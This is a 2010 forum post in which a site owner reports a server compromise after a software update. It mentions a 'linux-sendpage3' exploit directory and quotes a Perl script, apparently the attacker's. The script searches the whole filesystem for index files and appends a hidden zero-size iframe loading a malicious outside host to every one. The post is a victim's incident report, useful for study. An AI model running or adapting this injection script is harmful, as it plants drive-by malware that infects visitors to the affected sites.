Group: Member
Post Group: Newbie
Posts: 5
Status:
|
Ok easy way to explain this is on the 6th you updated your files to 2.9 ver and today i noticed in my ftp new files
http://rapidshare.com/files/396864984/files.rar.html
on the sith at this time i send a reprt to my web host that i cant get into my admin panel i was locked out CPAnel 2 hours hacked
then today i put all the info into terms they can see but they are idiots and will be deleting my my money for support that wont help
and say it my faul
So i am coming to your attention that that it was most likely installed at the time your update was opened
a new directory linux-sendpage3 was made after updating to or around the time your update completed
follow this directions to see how
Go to untiled.jpg
i am attaching my rar witht he image file in the rar
open that pic file
notice the dates and times .
after open index.php to show the files modified then open the 993698.txt
file and notice the link at the bottom.
#!/usr/bin/perl
system("locate index.* >> index");
system("find / -name index.* >> index");
open(a,"<index");
@ind = <a>;
close(a);
$b = scalar(@ind);
for($a=0;$a<=$b;$a++){
chomp $ind[$a];
system("echo ' <iframe src=\"http:\/\/zuo.podgorz.org\/zuo\/elen\/index.php\" width=\"0\" height=\"0\" frameborder=\"0\"><\/iframe>\' >> $ind[$a]");
open anybrowser and input that links maker addy
this link
zuo.podgorz.org
Whamm you get a unsafe url
http://www.securityfocus.com/bid/36038/exploit
seems i cant aqttach the files to support let em know how i can help further
Edited by streetmedic : June 9, 2010, 12:10 am |